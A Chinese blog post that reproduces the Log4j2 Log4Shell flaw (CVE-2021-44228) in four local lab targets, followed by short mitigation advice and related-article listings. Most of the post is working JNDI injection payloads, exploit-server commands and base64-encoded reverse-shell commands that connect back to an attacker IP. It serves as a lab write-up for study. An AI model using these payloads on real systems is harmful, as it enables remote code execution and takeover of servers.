log4j2漏洞复现(CVE-2021-44228)

最新推荐文章于 2024-05-19 09:49:26 发布
最新推荐文章于 2024-05-19 09:49:26 发布
阅读量3.4k 收藏 10
点赞数 2
分类专栏: web安全 文章标签: 安全 java 开发语言 linux log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/122206051
版权

目录

漏洞简介:

log4j是Apache公司的一款JAVA日志框架,基本上只要是java的框架都会用到这个log4j框架,所以上周不管是不是IT圈的都几乎被刷屏了,可见这个洞的危害之大,波及范围之广。所以复现一下。

影响版本:

Apache Log4j 2.x >=2.0-beta9 且 < 2.15.0

复现环境1:

1.log4shell-vulnerable-app环境:

docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

https://s4.ax1x.com/2021/12/28/TyzwUx.png

2.下载JNDIExploit工具,监听8888端口开启LADP服务:

wget https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2
unzip JNDIExploit.v1.2.zip
**java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.0.16 -p 8888**

https://s4.ax1x.com/2021/12/28/Tyz056.png

3.poc就是在http请求头中加入:

X-Api-Version: ${jndi:ldap://192.168.0.16:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}

https://s4.ax1x.com/2021/12/28/TyzdV1.png

https://s4.ax1x.com/2021/12/28/Tyzs2D.png

💡Command/Base64是指把命令先经过base64编码

4.这里一定要注意靶机的ip地址:

https://s4.ax1x.com/2021/12/28/TyzUbR.png

5.命令执行成功,已经创建了/tmp/pwned文件:

https://s4.ax1x.com/2021/12/28/Tyz056.png

https://s4.ax1x.com/2021/12/28/Tyzr8O.png

💡JNDIExploit支持多种的注入方式包括命令,dnslog,shell和reverseShell等方式

反弹nc:

X-Api-Version: ${jndi:ldap://192.168.0.16:1389/Basic/Command/Base64/cm0gL3RtcC9mIDsgbWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mIHwgL2Jpbi9zaCAtaSAyPiYxIHwgbmMgMTkyLjE2OC4wLjE2IDU1NTUgPi90bXAvZg==}

💡由于靶机环境没有bash,所以用nc反弹/bin/sh

https://s4.ax1x.com/2021/12/28/Tyz5Pf.pnghttps://s4.ax1x.com/2021/12/28/Tyz5Pf.png

https://s4.ax1x.com/2021/12/28/Tyzfat.png

命令已经成功被解析,反弹成功。

https://s4.ax1x.com/2021/12/28/TyzhIP.png

💡如果base64编码出现+号的话,要经过url编码(如果使用hackbar或burp)

复现环境2:

1.运行vulfocus/log4j2-rce-2021-12-09靶机环境:

docker run -d --net=host  --rm  vulfocus/log4j2-rce-2021-12-09

https://s4.ax1x.com/2021/12/28/TyzoRS.png

2.使用JNDI-Injection-Exploit一键注入:

https://s4.ax1x.com/2021/12/28/T6eUp9.png

#-C:远程class文件中要执行的命令 -A:服务器地址,可以是IP地址或者域名
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,dG91Y2ggL3RtcC9wd25lZA==}|{base64,-d}|{bash,-i}" -A "192.168.0.16"

https://s4.ax1x.com/2021/12/28/T6ewOx.png

😅这两个靶机的页面好像啊。。。

https://s4.ax1x.com/2021/12/28/T6eykD.png

poc是Ip:port/hello payload=${jndi:rmi://192.168.0.16:1099/zm6rw4}

💡这个靶机的poc是使用rmi的,其他大部分用的是LDAP

https://s4.ax1x.com/2021/12/28/T6eD0K.png

https://s4.ax1x.com/2021/12/28/T6eBm6.png

反弹nc:

bash -i >& /dev/tcp/192.168.0.16/5555 0>&1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C  "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTYvNTU1NSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.0.16"
payload=${jndi:rmi://192.168.0.16:1099/old9aj}

https://s4.ax1x.com/2021/12/28/T6erTO.png

https://s4.ax1x.com/2021/12/28/T6ecfH.png

https://s4.ax1x.com/2021/12/28/T6eW6I.png

nc -lvvp 5555

https://s4.ax1x.com/2021/12/28/T6e6te.png

反弹成功。

复现环境3:

1.使用python复现环境,安装依赖包:

pip install -r requirements.txt
git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc  #运行靶场
python3 poc.py --userip localhost --webport 8000 --lport 5555
python3 poc.py --userip 192.168.0.16 --webport 8000 --lport 5555
nc -lvvp 5555 #反弹nc
#保证 8000和5555端口没被占用

浏览器输入ip+8080端口:

https://s4.ax1x.com/2021/12/29/T6KjGF.png

💡在网页输入框中输入payload,就是运行poc之后输出的jndi注入链接

${jndi:ldap://192.168.0.16:1389/a}

https://s4.ax1x.com/2021/12/29/T6KL5T.png

https://s4.ax1x.com/2021/12/29/T6Kv24.png

💡如果是window环境,需要更换一下poc.py中的/bin下的jdk目录。

https://s4.ax1x.com/2021/12/29/T6KqaV.png

💡需要jdk1.8的环境

复现环境4:

1.下载windows上的靶场环境:

git clone https://github.com/christophetd/log4shell-vulnerable-app.git 
cd log4shell-vulnerable-app/ 
gradlew.bat appRun #windows环境

https://s4.ax1x.com/2021/12/29/Tc8Tne.png

2.打开浏览器ip+8888端口,配合JNDI-Injection-Exploit就可以弹出计算器了。

https://s4.ax1x.com/2021/12/29/Tc856O.png

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'calc.exe'  
x-log: ${jndi:rmi://192.168.0.16:1099/qqs5b2} #poc

https://s4.ax1x.com/2021/12/29/Tc841K.png

安全建议:

1.升级log4框架。

2.禁止日志服务器外连。

3.添加jvm启动参数:-Dlog4j2.formatMsgNoLookups=true

4.使用高版本JDK

https://github.com/Mr-xn/JNDIExploit-1

https://github.com/christophetd/log4shell-vulnerable-app

https://github.com/welk1n/JNDI-Injection-Exploit

https://github.com/kozmer/log4j-shell-poc

https://github.com/tothi/log4shell-vulnerable-app

lionwerson
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
JNDI注入-RMI&LDAP服务(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
09-14 1097
使用jndi注入工具:JNDI-Injection-Exploit可以生成远程调用链接ldap://47.94.236.117:1389/nx5qkh,ldap://47.94.236.117:1389/nx5qkh:执行远程地址的一个class文件,功能:调用47.94.236.117的计算器。JNDIjava系统自带的api,用于访问ldap,rmi...的api,ldap和rmi是JNDI内置接口,他们这些接口可以远程调用执行一些文件,文件中可以命令执行,如调用计算器。Injection和。
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5148
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
探索Java安全新边界:JNDI-Inject-Exploit
最新发布
gitblog_00011的博客
05-19 314
探索Java安全新边界:JNDI-Inject-Exploit 项目地址:https://gitcode.com/exp1orer/JNDI-Inject-Exploit 1、项目介绍 JNDI-Inject-Exploit 是一个强大的工具,专门针对Fastjson、log4j2和原生JNDI注入漏洞进行检测和利用。它有效地解决了针对高版本JDK的Bypass问题,允许在具有反序列化Gadget...
log4j2漏洞复现
weixin_51681694的博客
05-10 841
apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失受影响的组件。
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
jndi-1.2.1.jar.zip
03-20
ndi1..2.1所需要的jar,1,。2.1
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
log4j2原理分析及漏洞复现
HUANGXIN9898的博客
10-23 855
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
从0到1java安全5
qq_29948489的博客
05-19 303
在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上是标准的数据交换格式。分析漏洞利用,输出转换的数据类型(类),有一个@type的参数,默认有但是不显示,这里使用 SerializerFeature.WriteClassName,来显示这个参数。我们IDEA设置Maven的时候可以看到,其实IDEA已经自带了Maven,直接配置IDEA中的Maven可以省去下载Maven的步骤了。
漏洞复现】Apache log4j RCE 远程代码执行漏洞(CVE-2021-44228)
qq_45244158的博客
12-14 5505
Log4j任意代码执行RCE(CVE-2021-44228)前言一、漏洞描述二、受影响的版本三、复现过程1.从Vulfocus靶场获取测试环境2.攻击过程四、修复建议1.升级到最新版本2.缓解措施3.流量查询 前言 2021年11月24日,阿里云安全团队正式向Apache报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2的部分功能具有递归分析功能,攻击者可以直接构造恶意请求触发远程代码执行漏洞。 一、漏洞描述 Apache Log4j2 是一个基于 Java 的日志工具。这
Apache Log4j2漏洞复现
weixin_51151498的博客
01-23 1370
Apache Log4j2漏洞
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。...总之,Apache Log4j2CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升级到修复版本、加强监控和审查日志活动是应对该漏洞的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值